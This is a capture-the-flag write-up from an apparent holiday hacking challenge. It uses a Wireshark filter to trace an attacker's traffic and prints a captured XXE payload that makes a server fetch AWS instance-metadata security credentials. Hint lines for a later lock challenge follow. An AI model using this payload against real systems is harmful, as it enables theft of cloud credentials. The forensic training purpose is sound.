Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. Most of the traffic to this site is nice, but one IP address is being naughty! Which is it? Visit Sparkle Redberry in the Web Ring for hints.
Let's open up Wireshark again. As we know the source must be ip 18.222.86.32
(seen in the challenges before), and AWS IMDS lookups contain a special IP 169.254.169.254
we build the following filter:
ip.src_host == "18.222.86.32" and tcp.reassembled.data contains "169.254.169.254"
We select the last entry and right-click -> follow -> HTTP stream:
POST /proc HTTP/1.1
Host: www.toteslegit.us
...
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY id SYSTEM "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"> ]>
<product><productId>&id;</productId></product>
HTTP/1.1 200 OK
So the URL fetched is http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
.
We get following hints:
The locks take input, render some type of image, and process on the back end to unlock. To start, take a good look at the source HTML/JavaScript.
Understanding how Content-Security-Policy works can help with this challenge.
Developers use both client- and server-side input validation to keep out naughty input.